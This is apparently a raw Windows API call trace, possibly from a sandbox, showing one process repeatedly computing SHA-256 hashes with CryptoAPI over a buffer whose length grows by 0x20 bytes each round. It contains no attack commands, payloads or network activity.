	[0119.005] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.005] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd4d8
	[0119.005] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd4d8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd4d8, pdwDataLen=0x12942c) returned 1
	[0119.005] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.005] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.005] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.006] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.006] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0119.006] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.006] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd500
	[0119.006] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd500, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd500, pdwDataLen=0x12942c) returned 1
	[0119.006] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.006] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.006] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.006] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.006] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0119.006] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.006] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd528
	[0119.006] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd528, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd528, pdwDataLen=0x12942c) returned 1
	[0119.006] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.006] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.006] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.007] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.007] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0119.007] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.007] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd550
	[0119.007] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd550, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd550, pdwDataLen=0x12942c) returned 1
	[0119.007] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.007] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.007] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.007] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.007] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0119.007] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.007] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd578
	[0119.007] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd578, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd578, pdwDataLen=0x12942c) returned 1
	[0119.007] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.007] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.008] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.008] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.008] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0119.008] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.008] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd5a0
	[0119.008] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd5a0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd5a0, pdwDataLen=0x12942c) returned 1
	[0119.008] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.008] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.008] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.008] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.008] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0119.008] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.008] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd5c8
	[0119.008] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd5c8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd5c8, pdwDataLen=0x12942c) returned 1
	[0119.008] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.009] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.009] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.009] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.009] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0119.009] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.009] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd5f0
	[0119.009] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd5f0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd5f0, pdwDataLen=0x12942c) returned 1
	[0119.009] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.009] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.009] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.009] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.009] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0119.010] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.010] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd618
	[0119.010] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd618, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd618, pdwDataLen=0x12942c) returned 1
	[0119.010] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.010] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.010] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.010] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.010] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0119.010] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.010] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd640
	[0119.010] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd640, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd640, pdwDataLen=0x12942c) returned 1
	[0119.010] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.010] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.010] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.011] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.011] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0119.011] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.011] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd668
	[0119.011] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd668, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd668, pdwDataLen=0x12942c) returned 1
	[0119.011] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.011] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.011] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.011] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.011] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0119.011] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.011] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd690
	[0119.011] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd690, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd690, pdwDataLen=0x12942c) returned 1
	[0119.011] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.011] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.011] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.012] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.012] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0119.012] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.012] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd6b8
	[0119.012] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd6b8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd6b8, pdwDataLen=0x12942c) returned 1
	[0119.012] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.012] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.012] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.012] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.012] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0119.012] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.012] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd6e0
	[0119.012] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd6e0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd6e0, pdwDataLen=0x12942c) returned 1
	[0119.012] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.012] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.012] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.013] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.013] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0119.013] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.013] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd708
	[0119.013] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd708, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd708, pdwDataLen=0x12942c) returned 1
	[0119.013] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.013] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.013] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.013] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.013] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0119.013] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.013] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd730
	[0119.013] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd730, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd730, pdwDataLen=0x12942c) returned 1
	[0119.013] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.013] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.013] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.014] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.014] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0119.014] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.014] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd758
	[0119.014] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd758, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd758, pdwDataLen=0x12942c) returned 1
	[0119.014] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.014] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.014] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.014] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.014] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0119.014] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.014] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd780
	[0119.014] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd780, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd780, pdwDataLen=0x12942c) returned 1
	[0119.014] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.014] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.015] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.015] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.015] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0119.015] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.015] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd7a8
	[0119.015] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd7a8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd7a8, pdwDataLen=0x12942c) returned 1
	[0119.015] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.015] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.015] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.015] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.015] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0119.015] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.015] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd7d0
	[0119.015] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd7d0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd7d0, pdwDataLen=0x12942c) returned 1
	[0119.015] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.015] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.016] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.016] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.016] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0119.016] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.016] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd7f8
	[0119.016] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd7f8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd7f8, pdwDataLen=0x12942c) returned 1
	[0119.016] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.016] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.016] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.016] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.016] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0119.016] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.016] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd820
	[0119.016] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd820, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd820, pdwDataLen=0x12942c) returned 1
	[0119.016] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.017] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.017] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.017] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.017] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0119.017] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.017] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd848
	[0119.017] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd848, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd848, pdwDataLen=0x12942c) returned 1
	[0119.017] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.017] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.017] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.017] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.017] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0119.017] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.017] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd870
	[0119.018] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd870, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd870, pdwDataLen=0x12942c) returned 1
	[0119.018] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.018] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.018] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.018] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.018] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0119.018] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.018] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd898
	[0119.018] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd898, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd898, pdwDataLen=0x12942c) returned 1
	[0119.018] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.018] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.018] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.018] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.018] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0119.018] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.018] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd8c0
	[0119.019] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd8c0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd8c0, pdwDataLen=0x12942c) returned 1
	[0119.019] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.019] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.019] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
